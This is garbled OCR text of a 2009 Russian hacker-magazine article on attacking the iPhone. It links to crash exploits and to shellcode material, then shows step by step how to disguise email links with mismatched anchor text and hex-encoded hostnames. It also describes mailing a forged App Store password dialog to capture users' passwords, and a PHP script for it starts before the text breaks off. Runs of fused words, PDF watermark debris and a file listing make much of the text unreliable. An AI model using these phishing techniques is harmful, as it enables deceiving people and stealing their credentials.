Первой ласточкой стала ошибка в библиотеке libtiff, существовавшая на первом поколении телефонов и благополучно исправленная во вторых прошивках. Далее исследователи копали главным образом javascript-процессор. Благо, тут было на что опираться: движок WebKit перелопатили, ещекогдаiPhone ивпроектенебыло, поэтому наработокхотьпрудпруди. Яумышленнонебудуподробноразбирать существующие экспойты для iPhone. Во-первых, хочется посвятить

этомуотдельнуюстатью. Во-вторых, покабудетлогичнымразобраться с более простыми атаками. Можешь попробовать готовые реализации:

http://www.iphoneworld.ca/exploits/crash-my-iphone. html

058	XÀÊÅÐ 03 /123/ 09

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
				to	BUY
w Click				to						m
w Click										m
w
	w								o
	.							.c
		p					g
			df			n		e
				-xcha

				hang		e
			C			e	E
		X					E
	-							d
	F								t
	D								i
	D								r
P						NOW!			o
P
					BUY
взломw				to	BUY
w Click				to
w Click									o	m
	w								o
	.							.c
		p					g
			df			n		e
				-x cha

ЛожныйдиалогвводапароляAppleStore скинетнампарольпользователя

http://www.iphoneworld.ca/exploits/iphone-crash.html

Онипрекраснофункционируютнапоследней(намоментнаписаниястатьи) прошивке2.2.

Еще пару слов о шелл-кодах. Есть прекрасная статья на метаспоите

(http://blog.metasploit.com/2007/09/root-shell-in-my-pocket-and-maybe- yours.html), в которой подробно описываются многие аспекты безопасности яблочного телефона и процесс создания (а вернее, портирования) шелл-кодадляiPhone. Рассказатьобэтомлучше, чемсделалH.D.Moore, уменяврядлиполучится, поэтомупростоотправляюкпервоисточнику. К слову, этастатьябыланаписанааж25 сентября2007 года! Запасиськофе

— чаем — сигаретами (нужное подчеркнуть) и приятного чтения. А если

хватитсилидерзостисамомуброситьсяискатьновыедыры, рекомендую дляначалапроверитьвсенайденныеуязвимостивSafari.Что-томнепод- сказывает: невсеизнихзакрытывмобильнойверсии;).

АТАКА3. FISHING/XSS

Привожу два типа атак вместе, и связано это с тем, что «так исторически сложилось»: сначала попалось сообщение об угрозе фишинга на iPhone, затемзахотелосьрасширитьизысканиядоXSS. Ктомуже, ничегоконкретного по межсайтовому скриптингу я не получил, поэтому выделять в отдельныйразделсчитаюнецелесообразным. Итак, начнем. Однаждыжарким летнимднемрассылкасеклабасообщила, чтонекийизраильскийэксперт АвивРаффнашелуязвимостьвклиентеэлектроннойпочтыiPhone, которая позволяетмаскироватьложныессылкивписьмах. Перейдяпосовершенно корректнойиизвестнойнавидссылке, пользовательпопадаетнасайт, где ему под разным соусом предлагается отправить какие-то личные данные. Вобщем, схемастандартная, теперьореализации. Чтотампридумализра-

ильский эксперт, конечно, не сообщается, однако первое, что мне пришло наумпроверить, прочитавэтотадвайс— обработкуhtml-тэговвписьмахна iPhone. Недолгодумая, яотправилсамсебеписьмовhtml-формате:

<a href=http://google.ru>http://yandex.ru</a>

Открывэтосообщениечерезвстроенныйпочтовыйагенттелефона, яничутьнеудивился.Ссылканазываласьhttp://yandex.ru,апереходила,каки положено, наhttp://google.ru. Самоеинтересное, чтоеслипослатьe-mail в формате обычного текста, со следующим содержанием: http://yandex. ru, то визуально это сообщение от вышерассмотренного отличаться не будет. Однакоссылкибудутвестинаразныесайты. Еслиподержатьпалец натакойссылкевысветитсявсплывающаяподсказка, вкоторойбудетсодержатьсяадресреальногосайта. Недолгодумая, япопробовал

<a href="%68%74%74%70%3A%2F%2F%67%6F%6F%67%6C%65%2E%72 %75">http://yandex.ru</a>

и был разочарован — почтовый клиент такое парсить отказался, ссылка быланеработоспособна. Совторойпопыткиполучилось— япростооставилдирективу«http://»:

<a href="http://%67%6F%6F%67%6C%65%2E%72%75">http:// yandex.ru</a>

Этоужеработалокорректно, понажатиюнассылкуизписьмаоткрывался браузер с Гуглом. Всплывающее окно отображало хексы, а не явный вид урла. В дополнение ко всему я убедился, что почтовик не воспринимает атрибуты title и alt. Подвиг израильского багоискателя был повторен, и я решилсделатьстраницусформой,точноповторяющейдиалогзапросапаролядляAppleStore(этотдиалогвсплываетпостоянно,парользаписатьнельзя, поэтомупользователиуженаавтоматевбиваютданные) иотправить еевнутриiframe втелеписьма. Яснялскриншотсоригинальногодиалога, распилил его на картинки и собрал в HTML-таблице. Верстка под Safari оказаласьнеоченьпростой,но,всеже,результатвышелоченьпохожимна правду. Чтобыпроверитьеговработе, былнаписанпростойскрипт:

<?php $fish=' <html>

</td>

</tr>

</td>

</td>

</tr> <tr >

XÀÊÅÐ 03 /123/ 09	059

<<< < Предыдущая 1 2 3 4 56 / 156 7 8 9 10 11 12 13 14 15 > Следующая >>>

Соседние файлы в папке журнал хакер

#
20.04.202418.73 Mб12118_Optimized.pdf
#
20.04.202434.23 Mб12119_Optimized.pdf
#
20.04.202432.48 Mб12120_Optimized.pdf
#
20.04.202447.9 Mб12121_Optimized.pdf
#
20.04.202449.28 Mб12122_Optimized.pdf
#
20.04.202422.66 Mб12123_Optimized.pdf
#
20.04.202414.76 Mб12124_Optimized.pdf
#
20.04.202411.92 Mб12125_Optimized.pdf
#
20.04.202412.83 Mб12126_Optimized.pdf
#
20.04.202416.73 Mб12127_Optimized.pdf
#
20.04.202416.61 Mб12128_Optimized.pdf